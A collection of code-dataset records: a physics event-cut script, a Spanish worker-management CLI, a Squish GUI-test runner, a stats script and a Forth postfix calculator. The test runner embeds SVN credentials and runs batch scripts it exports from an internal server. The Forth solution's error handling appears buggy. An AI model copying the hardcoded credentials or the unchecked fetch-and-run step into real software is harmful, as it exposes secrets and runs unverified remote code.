which will now all be non-zero/non-infinite\n\ndef DPhi(met, met_phi, jet_pt,jet_eta,jet_phi,jet_m):\n Dphi = np.zeros([met.size])\n MET_TLV = LV.LorentzVector()\n Jet_TLV = LV.LorentzVector()\n for i in range(met.size):\n MET_TLV.SetXYZT(met[i]*np.cos(met_phi[i]),met[i]*np.sin(met_phi[i]),0,0)\n Jet_TLV.SetPtEtaPhiM(jet_pt[i],jet_eta[i],jet_phi[i],jet_m[i])\n DeltaPhi = abs(MET_TLV.DeltaPhi(Jet_TLV))\n Dphi[i] = DeltaPhi\n \n return Dphi\n\n#Do the same thing as before, new dictionary with some new variables added\ndef postprocess(DataDict):\n processed = {}\n processed['met_phi'] = DataDict['met_phi']\n #processed['baselineLep_n'] = DataDict[b'baselineLep_n']\n \n processed['jet_n'] = DataDict['jet_n']\n \n processed['jet1_pt'] = DataDict['jet1_pt'] #momenta of 1st jet, 0 if no jets\n processed['jet2_pt'] = DataDict['jet2_pt'] #momenta of 2nd jet, 0 if no 2nd jet\n processed['jet3_pt'] = DataDict['jet3_pt'] #same\n \n processed['HT'] = DataDict['HT']\n processed['Meff'] = DataDict['met']+DataDict['HT']\n processed['HT_Sig'] = (DataDict['met']/np.sqrt(DataDict['HT'])) #HT_sig = MET/(HT)^(1/2) \n #processed['jet_pt'] = JaggedFixer(DataDict[b'jet_pt'],DataDict[b'jet_n'])\n \n processed['DPhi1'] = DPhi(DataDict['met'],DataDict['met_phi'],DataDict['jet1_pt'],DataDict['jet1_eta'],DataDict['jet1_phi'],DataDict['jet1_m'])\n processed['DPhi2'] = DPhi(DataDict['met'],DataDict['met_phi'],DataDict['jet2_pt'],DataDict['jet2_eta'],DataDict['jet2_phi'],DataDict['jet2_m'])\n \n processed['met'] = DataDict['met']\n processed['Is_Signal'] = DataDict['Is_Signal']\n processed['event_weight'] = DataDict['event_weight']\n \n \n \n return processed\n\n#Variables we now have\nPostVariables = ['jet_n','jet1_pt','jet2_pt','jet3_pt','met','met_phi','HT','HT_Sig','Meff','DPhi1','DPhi2','Is_Signal','event_weight']\n\nPostData = postprocess(CutDataDict)\n\n#If additional cuts need to be made on variables that couldn't be introduced until now (HT_Sig, Meff, Dphi's), do that here\nPostremovedIndeces = []\nfor i in range(len(PostData['met'])):\n if (PostData['HT_Sig'][i]<6 or PostData['Meff'][i]<300):\n \tPostremovedIndeces.append(i)\n \t\nFinalData = CutData(PostData,PostremovedIndeces, PostVariables)\n\n#print(\"Number of events:\", len(FinalData['met']))\n\n#Save to DF\nDataFrame = pd.DataFrame.from_dict(FinalData)\nif (len(sys.argv)>2):\n DataFrame.to_pickle(sys.argv[1]+sys.argv[2]+'DF.pkl')\nelse:\n DataFrame.to_pickle(sys.argv[1]+'DF.pkl')\n\n","sub_path":"NN/CutData.py","file_name":"CutData.py","file_ext":"py","file_size_in_byte":6282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"217692723","text":"import Funciones\nfrom Contrato import Contrato\nfrom Responsable import Responsable\nfrom Trabajador import Trabajador\n\ntalleres = {}\ncontTalleres = 0\ntrabajadores = {}\ncontTrabajadores = 0\ncontratos = {}\ncontContratos = 0\n\ncontinuar = True\n\nkeyMax = 0\nfor key, trabajador in Funciones.cargarTrabajadores().items():\n trabajadores[key] = trabajador\n if int(key) > int(keyMax):\n keyMax = key\nif len(trabajadores) > 0:\n contTrabajadores = int(keyMax)+1\n\nkeyMax = 0\nfor key, taller in Funciones.cargarTalleres().items():\n talleres[key] = taller\n if int(key) > int(keyMax):\n keyMax = key\nif len(talleres) > 0:\n contTalleres = int(keyMax)+1\n\nkeyMax = 0\nfor key, contrato in Funciones.cargarContratos().items():\n contratos[key] = contrato\n if int(key) > int(keyMax):\n keyMax = key\nif len(contratos) > 0:\n contContratos = int(keyMax)+1\n\n\ntry:\n 
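The `DPhi` helper above builds two `LorentzVector` objects per event just to take an azimuthal difference. Since only the angles matter, the same quantity can be computed vectorized by wrapping the raw difference into [0, π]; a sketch, assuming `LV.DeltaPhi` follows the usual ROOT convention of a signed difference in (-π, π]:

```python
import numpy as np

# |delta phi| folded into [0, pi], computed directly from the angles,
# with no TLorentzVector round-trip.
def delta_phi(phi1, phi2):
    d = np.abs(phi1 - phi2) % (2 * np.pi)        # raw difference in [0, 2*pi)
    return np.where(d > np.pi, 2 * np.pi - d, d) # fold into [0, pi]

met_phi = np.array([0.1, 3.0])
jet_phi = np.array([-3.1, -3.0])
print(delta_phi(met_phi, jet_phi))   # ~[3.083, 0.283]
```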
while continuar:\n        print(\"############################################\")\n        print(\"#                   MENU                   #\")\n        print(\"############################################\")\n        print(\"#                                          #\")\n        print(\"#  1. Register a worker                    #\")\n        print(\"#  2. Show workers and supervisors         #\")\n        print(\"#  3. Reassign a worker                    #\")\n        print(\"#  4. Deactivate a worker                  #\")\n        print(\"#                                          #\")\n        print(\"#  5. Assign a supervisor                  #\")\n        print(\"#                                          #\")\n        print(\"#  6. Show workshops                       #\")\n        print(\"#                                          #\")\n        print(\"#  7. Generate reports                     #\")\n        print(\"#                                          #\")\n        print(\"# 10. Exit (and save)                      #\")\n        print(\"#                                          #\")\n        print(\"############################################\")\n\n        print()\n        menu = input(\"Chosen option: \")\n        print()\n\n        if menu == \"1\":\n            tipo = input(\"Is this a new worker or an inactive one? (0 = Inactive | 1 = New)\")\n            if tipo == \"0\":\n                idInactivo = input(\"ID of the inactive worker: \")\n                if not Funciones.existeId(trabajadores, idInactivo):\n                    print(\"No worker exists with that ID.\")\n                elif trabajadores[int(idInactivo)].activo:\n                    print(\"That worker is currently active\")\n                else:\n                    contLoc = 0\n                    contTaller = 0\n                    valido = False\n                    while not valido:\n                        if contLoc == 0:\n                            localidadPref = input(\"Worker's preferred town: \")\n                            for key, taller in talleres.items():\n                                if taller.localidad == localidadPref:\n                                    contLoc += 1\n                                    if taller.vacantes > 0:\n                                        contTaller += 1\n                                        tallerTrab = key\n                                        valido = True\n                                        continue\n                        if contLoc == 0:\n                            print(\"No workshops exist in that town.\")\n                        elif contTaller == 0:\n                            print(\"No vacancies were found in that town\")\n                            tallerTrab = input(\"Choose a workshop: \")\n                            if not tallerTrab.isdigit():\n                                print(\"You must enter a number.\")\n                            else:\n                                for key, taller in talleres.items():\n                                    contTaller += 1\n                                    if key == int(tallerTrab):\n                                        valido = True\n                                        continue\n                                if contTaller == 0:\n                                    print(\"That ID does not exist, enter a valid ID.\")\n                    trabajadores[int(idInactivo)].activo = True\n                    trabajadores[int(idInactivo)].taller = tallerTrab\n                    talleres[int(tallerTrab)].vacantes -= 1\n\n                    contratos[contContratos] = Contrato(int(idInactivo), int(tallerTrab))\n                    contContratos += 1\n                    print(\"Worker reactivated and assigned successfully\")\n            elif tipo == \"1\":\n                trabajadores[contTrabajadores] = Funciones.crearTrabajador(talleres, trabajadores)\n                contratos[contContratos] = Contrato(contTrabajadores, trabajadores[contTrabajadores].taller)\n                contContratos += 1\n                contTrabajadores += 1\n            else:\n                print(\"Error, invalid option\")\n        elif menu == \"2\":\n            Funciones.mostrarDiccionarioSimple(trabajadores)\n            mas = input(\"Do you want to see detailed information for a worker? 
(Yes = worker ID | No = -1)\")\n            if not mas.isdigit() and not mas == \"-1\":\n                print(\"Enter a valid number.\")\n            else:\n                if not mas == \"-1\":\n                    if not Funciones.existeId(trabajadores, mas):\n                        print(\"No worker exists with that ID.\")\n                    else:\n                        print(str(trabajadores[int(mas)]))\n                        print()\n                        print(\"Workshops where the worker has worked: \")\n                        Funciones.mostrarContratosTrabajador(contratos, talleres, int(mas))\n        elif menu == \"3\":\n            idInactivo = input(\"Worker ID: \")\n            if not Funciones.existeId(trabajadores, idInactivo):\n                print(\"No worker exists with that ID.\")\n            else:\n                contLoc = 0\n                contTaller = 0\n                valido = False\n                while not valido:\n                    if contLoc == 0:\n                        localidadPref = input(\"Worker's preferred town: \")\n                        for key, taller in talleres.items():\n                            if taller.localidad == localidadPref:\n                                contLoc += 1\n                                if taller.vacantes > 0:\n                                    contTaller += 1\n                                    tallerTrab = key\n                                    valido = True\n                                    continue\n                    if contLoc == 0:\n                        print(\"No workshops exist in that town.\")\n                    elif contTaller == 0:\n                        print(\"No vacancies were found in that town\")\n                        tallerTrab = input(\"Choose a workshop: \")\n                        if not tallerTrab.isdigit():\n                            print(\"You must enter a number.\")\n                        else:\n                            for key, taller in talleres.items():\n                                contTaller += 1\n                                if key == int(tallerTrab):\n                                    valido = True\n                                    continue\n                            if contTaller == 0:\n                                print(\"That ID does not exist, enter a valid ID.\")\n                if isinstance(trabajadores[int(idInactivo)], Trabajador):\n                    talleres[int(trabajadores[int(idInactivo)].taller)].vacantes += 1\n\n                trabajadores[int(idInactivo)].activo = True\n                trabajadores[int(idInactivo)].taller = tallerTrab\n\n                if isinstance(trabajadores[int(idInactivo)], Trabajador):\n                    talleres[int(tallerTrab)].vacantes -= 1\n\n                contratos[contContratos] = Contrato(int(idInactivo), int(tallerTrab))\n                contContratos += 1\n                print(\"Worker reassigned\")\n        elif menu == \"4\":\n            idTrabajadorBaja = input(\"Worker ID: \")\n            if not Funciones.existeId(trabajadores, idTrabajadorBaja):\n                print(\"No worker exists with that ID.\")\n            elif not trabajadores[int(idTrabajadorBaja)].activo:\n                print(\"That worker is currently inactive\")\n            else:\n                trabajadores[int(idTrabajadorBaja)].activo = False\n                print(\"Worker deactivated successfully.\")\n        elif menu == \"5\":\n            idTrabajador = input(\"Worker ID: \")\n            if not Funciones.existeId(trabajadores, idTrabajador):\n                print(\"No worker exists with that ID.\")\n            elif isinstance(trabajadores[int(idTrabajador)], Responsable):\n                print(\"The worker is already the supervisor of a workshop. 
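An aside on menu options 1 and 3 above: they repeat the find-a-workshop-with-a-vacancy loop verbatim. A hypothetical shared helper (identifiers follow the original file; integer workshop keys are assumed, as in the original `key == int(tallerTrab)` comparison):

```python
# Hypothetical refactor of the duplicated vacancy-search loop: ask for a
# preferred town, return the key of a workshop with a free slot there, or
# fall back to asking for an explicit workshop ID.
def pick_workshop(talleres):
    while True:
        town = input("Worker's preferred town: ")
        matches = [k for k, t in talleres.items() if t.localidad == town]
        if not matches:
            print("No workshops exist in that town.")
            continue
        for key in matches:
            if talleres[key].vacantes > 0:
                return key
        print("No vacancies found in that town.")
        choice = input("Choose a workshop ID: ")
        if choice.isdigit() and int(choice) in talleres:
            return int(choice)
        print("That ID does not exist, enter a valid ID.")
```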
Before assigning them to another workshop, you must first assign a new supervisor.\")\n            else:\n                valido = False\n                while not valido:\n                    telefonoContacto = input(\"Phone: \")\n                    if not telefonoContacto.isdigit():\n                        print(\"Enter digits only.\")\n                    elif not len(telefonoContacto) == 9:\n                        print(\"The number must be 9 digits long.\")\n                    else:\n                        valido = True\n                valido = False\n                while not valido:\n                    nSegSoc = input(\"Social Security number: \")\n                    if not nSegSoc:\n                        valido = True\n                    elif not nSegSoc.isdigit():\n                        print(\"Enter digits only.\")\n                    elif not len(nSegSoc) == 9:\n                        print(\"The number must be 9 digits long.\")\n                    else:\n                        valido = True\n                trabajadores[int(idTrabajador)] = Responsable(trabajadores[int(idTrabajador)].nombre, trabajadores[int(idTrabajador)].apellidos, trabajadores[int(idTrabajador)].dni, trabajadores[int(idTrabajador)].activo, nSegSoc, trabajadores[int(idTrabajador)].taller, telefonoContacto, trabajadores[int(idTrabajador)].email, trabajadores[int(idTrabajador)].preferencia)\n        elif menu == \"6\":\n            Funciones.mostrarDiccionarioSimple(talleres)\n            mas = input(\"Do you want to see detailed information for a workshop? (Yes = workshop ID | No = -1)\")\n            if not mas.isdigit() and not mas == \"-1\":\n                print(\"Enter a valid number.\")\n            else:\n                if not mas == \"-1\":\n                    if not Funciones.existeId(talleres, mas):\n                        print(\"No workshop exists with that ID.\")\n                    else:\n                        print(str(talleres[int(mas)]))\n        elif menu == \"7\":\n            opcionInforme = input(\"\\t0. Worker report\\n\\t1. Workshop report\\n\\nChosen option: \")\n            if opcionInforme == \"0\":\n                idTrabajador = input(\"Worker ID: \")\n                if not Funciones.existeId(trabajadores, idTrabajador):\n                    print(\"No worker exists with that ID.\")\n                else:\n                    informe = Funciones.generarInformeTrabajador(idTrabajador, trabajadores[int(idTrabajador)], talleres, contratos)\n                    print(informe)\n            else:\n                idTaller = input(\"Workshop ID: \")\n                if not Funciones.existeId(talleres, idTaller):\n                    print(\"No workshop exists with that ID.\")\n                else:\n                    informe = Funciones.generarInformeTaller(idTaller, talleres[int(idTaller)], trabajadores, contratos)\n                    print(informe)\n\n            opcionGuardar = input(\"Do you want to save the report?\\n\\t0. No\\n\\t1. 
Sí\\n\\nOpción elegida: \")\n if opcionGuardar == \"1\":\n valido = False\n while not valido:\n nombreFichero = input(\"Nombre del fichero: \")\n if not nombreFichero:\n print(\"Debes introducir un nombre.\")\n else:\n Funciones.guardarInforme(nombreFichero, informe)\n valido = True\n elif menu == \"10\":\n Funciones.guardarTodo(talleres, trabajadores)\n continuar = False\n\n print()\n\n Funciones.guardarTodo(talleres, trabajadores)\nexcept:\n print(\"Ha ocurrido un error inesperado, pero no te preocupes, tus datos se han guardado.\")\nfinally:\n Funciones.guardarTodo(talleres, trabajadores)","sub_path":"EX01-Examen01/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":12746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"315349934","text":"import os\r\nimport re\r\nimport sys\r\nimport stat\r\nimport shlex\r\nimport getpass\r\nimport optparse\r\nimport shutil\r\n\r\nfrom xlib import xTools\r\n\r\n__author__ = 'syan'\r\n\r\nRUN_SQUISH = \"\"\"#!/bin/sh\r\n%(run_server)s\r\n%(sleep)s\r\n%(squishserver)s --config addAUT %(name_of_aut)s \"%(path_to_aut)s\"\r\n%(squishrunner)s --testsuite \"%(testsuite)s\" %(testcase)s --reportgen xml2.1,\"%(reportgen)s\" --cwd %(cwd)s --aut %(name_of_aut)s\r\n%(squishserver)s --stop\r\n\"\"\"\r\n\r\ndef kill_cmd(pid, on_win=True):\r\n if on_win:\r\n import win32con, win32api\r\n handle = win32api.OpenProcess(win32con.PROCESS_TERMINATE, 0, pid)\r\n win32api.TerminateProcess(handle, 0)\r\n win32api.CloseHandle(handle)\r\n else:\r\n kill_cmd_str = \"kill -9 %d\" % pid\r\n sts, text = xTools.get_status_output(kill_cmd_str)\r\n if sts:\r\n return 1\r\n\r\nclass RunSquish:\r\n def __init__(self):\r\n _xlib = os.path.join(xTools.get_file_dir(sys.argv[0]), \"xlib\")\r\n self.xlib = os.path.abspath(_xlib)\r\n self.user = getpass.getuser()\r\n # //////////////////////////\r\n # // Frank Chen need more check for the following suites\r\n # //\r\n self.prc_check_suites = (\"suite_BE_21_PIO_DRC\", \"suite_BE_01_SSO\")\r\n\r\n def process(self):\r\n self.run_option_parser()\r\n self.on_win, self.nt_lin = xTools.get_os_name(self.x86)\r\n if self.kill_all_squish_processes():\r\n return 1\r\n if self.kill_all:\r\n return\r\n if self.sanity_check():\r\n return 1\r\n\r\n if self.run_it():\r\n return 1\r\n\r\n self.behavior_check()\r\n\r\n def behavior_check(self):\r\n suite_name = os.path.basename(os.path.dirname(self.suite))\r\n if suite_name not in self.prc_check_suites:\r\n return\r\n case_log_dir = os.path.dirname(self.suite)\r\n # mush have \"case\" and \"log\" directory\r\n _dir_list = os.listdir(case_log_dir)\r\n if \"case\" not in _dir_list:\r\n return -1\r\n if \"log\" not in _dir_list:\r\n return -2\r\n cur_dir = os.getcwd()\r\n os.chdir(case_log_dir)\r\n if suite_name == \"suite_BE_01_SSO\":\r\n cmd_lines_a = [r'cp ./case/*.ini ./log/',\r\n r'cp ./case/scan_result.bat ./log/',]\r\n cmd_lines_b = [r'svn export http://d50534/auto/bqs_scripts/trunk --username=public --password=lattice --force',\r\n r'call scan_result.bat']\r\n else:\r\n cmd_lines_a = [r'cp ./case/*.ini ./log/',\r\n r'cp ./case/run.bat ./log/',]\r\n cmd_lines_b = [r'svn export http://d50534/auto/trunk --username=public --password=lattice --force',\r\n r'call run.bat']\r\n sts = 0\r\n for cmd in cmd_lines_a:\r\n if os.system(cmd):\r\n sts = \"Failed to run %s\" % cmd\r\n break\r\n os.chdir(\"log\")\r\n if not sts:\r\n for cmd in cmd_lines_b:\r\n if os.system(cmd):\r\n sts = \"Failed to run %s\" % cmd\r\n break\r\n os.chdir(cur_dir)\r\n 
return sts\r\n\r\n def run_option_parser(self):\r\n parser = optparse.OptionParser()\r\n parser.add_option(\"--debug\", action=\"store_true\", help=\"print debug message\")\r\n parser.add_option(\"--diamond\", help=\"specify Diamond install path\")\r\n parser.add_option(\"--squish\", help=\"specify Squish install path\")\r\n parser.add_option(\"--suite\", help=\"specify Squish Suite path\")\r\n parser.add_option(\"--case\", help=\"specify Squish case name\")\r\n parser.add_option(\"--x86\", action=\"store_true\", help=\"run with x86 vendor tools\")\r\n parser.add_option(\"--rpt-dir\", default=\"results\", help=\"specify final report path\")\r\n parser.add_option(\"--kill-all\", action=\"store_true\", help=\"kill all processes about Squish\")\r\n parser.add_option(\"--timeout\", type=\"int\", default=0, help=\"specify timeout value\")\r\n parser.add_option(\"--smoke\", action=\"store_true\", help=\"run smoke regression test only\")\r\n parser.add_option(\"--aut\", help=\"specify the AUT file name\")\r\n parser.add_option(\"--dev-path\", help=\"specify DEV(core scripts) path\")\r\n\r\n opts, args = parser.parse_args()\r\n self.debug = opts.debug\r\n self.diamond = opts.diamond\r\n self.squish = opts.squish\r\n self.suite = opts.suite\r\n self.case = opts.case\r\n self.x86 = opts.x86\r\n self.rpt_dir = opts.rpt_dir\r\n self.kill_all = opts.kill_all\r\n self.timeout = opts.timeout\r\n self.smoke = opts.smoke\r\n self.aut_name = opts.aut\r\n self.dev_path = opts.dev_path\r\n\r\n if not self.diamond:\r\n self.diamond = os.getenv(\"DIAMOND_\")\r\n if not self.squish:\r\n self.squish = os.getenv(\"SQUISH_\")\r\n if self.dev_path:\r\n if xTools.not_exists(self.dev_path, \"DEV Path\"):\r\n return 1\r\n os.environ[\"EXTERNAL_DEV_PATH\"] = xTools.win2unix(self.dev_path)\r\n\r\n def kill_all_squish_processes(self):\r\n if self.on_win:\r\n ps_cmd = \"%s -ef\" % os.path.join(self.xlib, \"ps\")\r\n else:\r\n ps_cmd = \"ps -ef | grep %s\" % self.user\r\n\r\n sts, tasklist = xTools.get_status_output(ps_cmd)\r\n if sts:\r\n xTools.say_it(\"-Error. 
Failed to run %s\" % ps_cmd)\r\n return 1\r\n xTools.say_it(tasklist, \"Tasklist:\", self.debug)\r\n\r\n kill_list = (\"squishrunner\", \"squishserver\")\r\n kill_pattern = [re.compile(item, re.I) for item in kill_list]\r\n for item in tasklist:\r\n item = item.strip()\r\n for p in kill_pattern:\r\n m = p.search(item)\r\n if m:\r\n break\r\n else:\r\n continue\r\n item_list = re.split(\"\\s+\", item)\r\n pid = int(item_list[1])\r\n kill_cmd(pid, self.on_win)\r\n\r\n def sanity_check(self):\r\n if xTools.not_exists(self.diamond, \"Diamond Install Path\"):\r\n return 1\r\n self.diamond = os.path.abspath(self.diamond)\r\n\r\n if xTools.not_exists(self.squish, \"Squish Install Path\"):\r\n return 1\r\n self.squish = os.path.abspath(self.squish)\r\n self.squishserver = os.path.join(self.squish, \"bin\", \"squishserver\")\r\n self.squishrunner = os.path.join(self.squish, \"bin\", \"squishrunner\")\r\n self.dllpreload = os.path.join(self.squish, \"bin\", \"dllpreload\")\r\n\r\n if xTools.not_exists(self.suite, \"Test Suite Path\"):\r\n return 1\r\n self.suite = os.path.abspath(self.suite)\r\n\r\n if xTools.wrap_md(self.rpt_dir, \"Report Path\"):\r\n return 2\r\n self.rpt_dir = os.path.abspath(self.rpt_dir)\r\n\r\n if self.aut_name:\r\n real_aut_file_name = xTools.get_fname(self.aut_name)\r\n if self.on_win:\r\n real_aut_file_name += \".exe\"\r\n self.aut = os.path.join(self.diamond, \"bin\", self.nt_lin, real_aut_file_name)\r\n else:\r\n if self.on_win:\r\n self.aut = os.path.join(self.diamond, \"bin\", self.nt_lin, \"pnmain.exe\")\r\n else:\r\n self.aut = os.path.join(self.diamond, \"bin\", self.nt_lin, \"diamond\")\r\n if xTools.not_exists(self.aut, \"AUT Path\"):\r\n return 1\r\n\r\n def run_it(self):\r\n if self.create_aut():\r\n return 1\r\n if self.copy_layout():\r\n return 1\r\n if self.run_suite():\r\n return 1\r\n\r\n def create_aut(self):\r\n self.aut_file = os.path.join(self.rpt_dir, \"tmp_aut.bat\")\r\n tmp_aut_lines = list()\r\n if self.on_win:\r\n tmp_aut_lines.append(\"set SQUISH_LIBQTDIR=%s\" % os.path.dirname(self.aut))\r\n tmp_aut_lines.append(\"%s %s\" % (self.dllpreload, self.aut))\r\n else:\r\n tmp_aut_lines.append(\"#!/bin/sh\")\r\n tmp_aut_lines.append(self.aut)\r\n xTools.write_file(self.aut_file, tmp_aut_lines)\r\n os.chmod(self.aut_file, stat.S_IRWXU)\r\n\r\n def copy_layout(self):\r\n for foo in os.listdir(self.suite):\r\n fname, fext = os.path.splitext(foo)\r\n if fext.lower() == \".ini\":\r\n src_ini = os.path.join(self.suite, foo)\r\n if self.on_win:\r\n dst_ini = os.path.join(r\"C:\\Users\\%s\\AppData\\Roaming\\LatticeSemi\\pnlayout\" % self.user, foo)\r\n else:\r\n dst_ini = os.path.join(\"/users/%s/.config/LatticeSemi/pnlayout\" % self.user, foo)\r\n if xTools.wrap_cp_file(src_ini, dst_ini):\r\n xTools.say_it(\"Failed to copy from {} to {}\".format(src_ini, dst_ini))\r\n return 1\r\n\r\n def copy_all_suite_2_rpt_dir(self):\r\n new_suite_dir = os.path.join(self.rpt_dir, os.path.basename(self.suite))\r\n if os.path.isdir(new_suite_dir):\r\n self.suite = new_suite_dir\r\n return\r\n try:\r\n shutil.copytree(self.suite, new_suite_dir)\r\n except Exception as e:\r\n print(e)\r\n return 1\r\n\r\n parent_dir = os.path.dirname(self.suite)\r\n for foo in os.listdir(parent_dir):\r\n if foo == \"case\":\r\n src_foo = os.path.join(parent_dir, foo)\r\n dst_foo = os.path.join(self.rpt_dir, foo)\r\n if os.path.isdir(dst_foo):\r\n continue\r\n try:\r\n shutil.copytree(src_foo, dst_foo)\r\n except Exception as e:\r\n print(e)\r\n return 1\r\n self.suite = new_suite_dir # use the 
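`kill_all_squish_processes` above shells out to `ps` and parses the output columns by hand. A hedged, cross-platform alternative using the third-party `psutil` package (not a dependency of the original script):

```python
import psutil  # third-party; not used anywhere else in this tool

# Kill every process whose name matches squishrunner or squishserver,
# without parsing `ps` output by hand.
def kill_squish_processes(names=("squishrunner", "squishserver")):
    for proc in psutil.process_iter(attrs=["pid", "name"]):
        pname = (proc.info["name"] or "").lower()
        if any(n in pname for n in names):
            try:
                proc.kill()
            except psutil.NoSuchProcess:
                pass  # process exited between listing and killing
```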
copied one!\r\n\r\n def run_suite(self):\r\n if self.copy_all_suite_2_rpt_dir():\r\n return 1\r\n flow_dict = dict(\r\n name_of_aut=os.path.basename(self.aut_file),\r\n path_to_aut=os.path.dirname(self.aut_file),\r\n\r\n squishserver=self.squishserver,\r\n squishrunner=self.squishrunner,\r\n\r\n testsuite=self.suite,\r\n reportgen=os.path.join(self.rpt_dir, \"report.xml\"),\r\n cwd=self.rpt_dir,\r\n )\r\n\r\n if self.on_win:\r\n flow_dict[\"run_server\"] = 'start \"SquishServer Window\" /B \"%s\" --verbose' % self.squishserver\r\n flow_dict[\"sleep\"] = \"%s 5\" % os.path.join(self.xlib, \"sleep\")\r\n else:\r\n flow_dict[\"run_server\"] = \"%s &\" % self.squishserver\r\n flow_dict[\"sleep\"] = \"sleep 5\"\r\n if self.case:\r\n flow_dict[\"testcase\"] = \"--testcase %s\" % self.case\r\n else:\r\n flow_dict[\"testcase\"] = \"\"\r\n\r\n if self.update_for_smoke_test():\r\n return 1\r\n\r\n run_lines = RUN_SQUISH % flow_dict\r\n run_suite_file = os.path.join(self.rpt_dir, \"run_squish.bat\")\r\n xTools.write_file(run_suite_file, run_lines)\r\n\r\n if self.on_win:\r\n sts = xTools.run_command(run_suite_file,\r\n os.path.join(self.rpt_dir, \"run_squish.log\"),\r\n os.path.join(self.rpt_dir, \"run_squish.time\"))\r\n else:\r\n sts = xTools.run_command(\"sh %s\" % run_suite_file,\r\n os.path.join(self.rpt_dir, \"run_squish.log\"),\r\n os.path.join(self.rpt_dir, \"run_squish.time\"))\r\n return sts\r\n\r\n def update_for_smoke_test(self):\r\n _root_dir = self.suite\r\n if self.case:\r\n _root_dir = os.path.join(self.suite, self.case)\r\n if xTools.not_exists(_root_dir, \"Root Suite/Case Path\"):\r\n return 1\r\n for root, dirs, files in os.walk(_root_dir):\r\n for item in files:\r\n fext = xTools.get_fext_lower(item)\r\n if fext == \".tsv\":\r\n tsv_file = os.path.join(root, item)\r\n if self.update_tsv_file(tsv_file):\r\n return 1\r\n\r\n def update_tsv_file(self, tsv_file):\r\n tsv_lines = xTools.get_original_lines(tsv_file)\r\n new_tsv_lines = list()\r\n i, smoke_idx = 0, -1\r\n for line in tsv_lines:\r\n line = line.strip()\r\n line_list = shlex.split(line)\r\n new_line = \"\\t\".join(line_list)\r\n if not self.smoke:\r\n new_tsv_lines.append(new_line)\r\n continue\r\n if not i: # the title line\r\n new_tsv_lines.append(new_line)\r\n try:\r\n smoke_idx = line_list.index(\"smoke\")\r\n except ValueError:\r\n pass\r\n i = 1\r\n else: # the design case info line\r\n if smoke_idx < 0: # no smoke tag\r\n new_tsv_lines.append(new_line)\r\n else: # has smoke tag\r\n try:\r\n smoke_tag = line_list[smoke_idx]\r\n except IndexError:\r\n smoke_tag = \"0\"\r\n if smoke_tag == \"0\":\r\n pass\r\n else:\r\n new_tsv_lines.append(new_line)\r\n\r\n if xTools.write_file(tsv_file, new_tsv_lines):\r\n return 1\r\n\r\nif __name__ == \"__main__\":\r\n my_flow = RunSquish()\r\n final_sts = my_flow.process()\r\n sys.exit(final_sts)\r\n\r\n\r\n\r\n\r\n","sub_path":"tmp_client/tools/corescripts3/DEV/tools/runSquish/run_squish.py","file_name":"run_squish.py","file_ext":"py","file_size_in_byte":13234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"488320603","text":"import numpy as np\nimport pickle\n\n\ndata_path = '../data/book_order_1_train.pkl'\n\nwith open(data_path, 'rb') as handle:\n data = pickle.load(handle)\n\ntimes, x = data['t'], data['x']\n\nprint(\"Time statistics, Number of users\", len(times))\nd = np.concatenate([y[1:, 0] for y in times], axis = None)\nprint(\"Interval stat: Min, Max, mu, std: \", d.min(), d.max(), d.mean(), d.std())\n\nprint(\"x 
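For reference, `run_suite` above fills the `RUN_SQUISH` template by %-formatting. A minimal rendering sketch, assuming the `RUN_SQUISH` template from this module is in scope; every path below is a hypothetical placeholder, not a value the tool ships with:

```python
# Minimal rendering of the RUN_SQUISH template above; all paths here are
# made-up placeholders for illustration only.
flow_dict = dict(
    run_server='start "SquishServer Window" /B "C:/squish/bin/squishserver" --verbose',
    sleep="sleep 5",
    squishserver="C:/squish/bin/squishserver",
    squishrunner="C:/squish/bin/squishrunner",
    name_of_aut="tmp_aut.bat",
    path_to_aut="C:/results",
    testsuite="C:/results/suite_demo",
    testcase="",                    # empty string -> run the whole suite
    reportgen="C:/results/report.xml",
    cwd="C:/results",
)
print(RUN_SQUISH % flow_dict)
```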
statistics\")\nys = np.concatenate([y for y in x], axis = None)\nvals, cnts = np.unique(ys, return_counts = True)\nprint(\"Number of events: \", np.max(vals)+1)\nprint(\"Count Distribution: \", cnts.min(), cnts.max(), cnts.mean(), cnts.std(), cnts.sum())\n\n\n","sub_path":"src/utils/get_stat.py","file_name":"get_stat.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"230024765","text":"# Forth라는 컴퓨터 언어는 스택 연산을 기반으로 하고 있어 후위 표기법을 사용한다. 예를 들어 3+4는 다음과 같이 표기한다.\n\n# 3 4 + .\n\n# Forth에서는 동작은 다음과 같다.\n\n# 숫자는 스택에 넣는다.\n\n# 연산자를 만나면 스택의 숫자 두 개를 꺼내 더하고 결과를 다시 스택에 넣는다.\n\n# ‘.’은 스택에서 숫자를 꺼내 출력한다.\n\n# Forth 코드의 연산 결과를 출력하는 프로그램을 만드시오. 만약 형식이 잘못되어 연산이 불가능한 경우 ‘error’를 출력한다.\n\n# 다음은 Forth 연산의 예이다.\n\n# [입력]\n\n# 첫 줄에 테스트 케이스 개수 T가 주어진다. 1≤T≤50\n \n# 다음 줄부터 테스트 케이스의 별로 정수와 연산자가 256자 이내의 연산코드가 주어진다. 피연산자와 연산자는 여백으로 구분되어 있으며, 코드는 ‘.’로 끝난다.\n\n# 나눗셈의 경우 항상 나누어 떨어진다.\n\n# [출력]\n\n# #과 1번부터인 테스트케이스 번호, 빈칸에 이어 계산결과를 정수로 출력하거나 또는 ‘error’를 출력한다.\n\ntest = int(input())\n\nfor n in range(test):\n code = list(input().split())\n res =[]\n flag=0\n for i in range(len(code)-1):\n if code[i].isdigit():\n res.append(code[i])\n else:\n try:\n num2, num1 = int(res.pop()), int(res.pop())\n if code[i] == \"+\": result = num1 + num2\n elif code[i] == \"-\": result = num1 - num2\n elif code[i] == \"/\": result = num1 // num2\n elif code[i] == \"*\": result = num1 * num2\n res.append(str(result))\n except:\n flag = 987654321\n \n if len(res) == 1 or flag==0:\n print(\"#{} {}\".format((n+1),res[0]))\n elif flag == 987654321 or len(res)>1:\n print(\"#{} {}\".format((n+1),\"error\"))\n 